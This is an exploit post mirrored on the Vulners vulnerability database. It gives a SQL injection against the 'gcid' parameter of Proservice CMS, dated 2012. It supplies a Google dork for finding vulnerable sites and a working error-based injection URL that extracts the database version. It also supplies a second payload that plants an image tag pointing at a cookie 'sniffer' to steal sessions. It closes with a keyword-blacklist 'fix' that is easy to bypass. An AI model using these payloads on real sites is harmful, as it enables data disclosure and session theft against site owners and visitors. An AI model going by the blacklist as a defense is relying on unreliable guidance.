Vulners
Lucene search
Proservice CMS Gallery Code SQL Injection Vulnerability
+-----------------------------------------------------------------
| # Exploit Title: Proservice CMS Gallery Code SQL Injection Vulnerability
| # Date: 30-06-2012
| # Author: cheki
| # Vendor Link: http://proservice.ge/
| # Category:WebApp
| # Price: NULL
| # Contact: [email protected]
| # Website: www.1337day.com && hacking.ge
| # Greetings to: Anuka Bolqvadze and to rest of the 1337day members
| # Google Dork: Created By: Pro-Service gcid=?
+-------------------------------------------------------------------
------------------[~Product Detail~]--------------------
Studio "PRO-Service" is a company which has serious technical-intelectual base to
make a suitable production for you and provide the development of internet resources
in Georgia.
Your site is a visit card of your business, first impression produce by a visual evaluation. Americain scientist due to their research have argued that 80% of customers
firststival appreciate
Web-site's appeareance and after his contents.
Because of this the design's creation is one of the most principal and difficult activities
while a creation of site and because good assumed
Web-design have been often made ,,<B>secret of succes</B>'' of firm, against other
covpetitor our company vill help you to plan your project in Internet and to
produce exact marketing strategie.
We make complicated,qualitative and individual web-sites which make an impression
on customers. Every staff of our study works for your interest. ,,Pro-Service''company
was staffed by a people with excellent professional skills.
--------------------------------------------------------
-----------------[~TARGET INFO~]------------------------------
~Apache httpd 2.2.15
~MYSQL: 5.0.51
~((Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2
~PHP/5.2.8
-------------------------------------------------------------
----------------[~SQL INJECTION EXPLOIT~]--------------------
http://TARGET/index.php?m=342&gcid=83'+and+(select+1+from+(select+count(0),concat((select version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
----------------[~create snifer~]--------------------------
+and+(select+1+from+(select+count(0),concat((select hex('<img src="your snifer hare')),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
-----------------------------------------------------------
----------------[~fix bug~]--------------------------------
for proservice.ge ^_^
PHP FILTER
preg_match('/(and|or|union|where|limit|group by|select|from|count|hex|rand|floor|\')/i', $gcid)
----------------------------------------------------------
---------------[~Greetings to~]--------------------------
Anuka Bolqvadze
----------------------------------------------------------
# 0day.today [2018-02-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Jun 2012 00:00Current
7.1High risk
Vulners AI Score7.1